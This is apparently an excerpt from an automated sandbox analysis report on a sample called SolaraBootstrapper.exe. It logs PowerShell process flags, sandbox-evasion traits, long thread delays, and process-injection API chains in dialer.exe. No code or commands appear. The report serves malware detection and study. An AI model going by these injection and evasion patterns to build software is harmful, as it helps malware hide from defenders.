Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,		46_2_00000001400010C0
Source: C:\Windows\System32\dialer.exe	Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,		63_2_00000001400010C0

Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Memory allocated: EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Memory allocated: 1210000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599715	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599575	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598935	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598820	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598246	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598117	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6214	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1424	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Window / User API: threadDelayed 1331	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Window / User API: threadDelayed 712	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7130	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1172	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8090	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1545	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7699
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1895
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Window / User API: threadDelayed 9995
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 3743
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 6257
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 8291
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 8147
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 1801

Source: C:\Windows\System32\lsass.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_68-14949
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_15-14897
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep	graph_2-14893

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_46-480

Source: C:\Windows\System32\conhost.exe	API coverage: 4.8 %
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	API coverage: 4.8 %
Source: C:\Windows\System32\lsass.exe	API coverage: 6.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1200	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -599715s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -599575s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598935s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598820s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598246s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598117s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7540	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7288	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep count: 8090 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep count: 1545 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep count: 7699 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508	Thread sleep count: 1895 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 5632	Thread sleep count: 9995 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 5632	Thread sleep time: -9995000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7872	Thread sleep count: 3743 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7872	Thread sleep time: -3743000s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 7872	Thread sleep count: 6257 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7872	Thread sleep time: -6257000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 7452	Thread sleep count: 8291 > 30
Source: C:\Windows\System32\dialer.exe TID: 7452	Thread sleep time: -829100s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 8012	Thread sleep count: 8147 > 30
Source: C:\Windows\System32\lsass.exe TID: 8012	Thread sleep time: -8147000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 8012	Thread sleep count: 1801 > 30
Source: C:\Windows\System32\lsass.exe TID: 8012	Thread sleep time: -1801000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
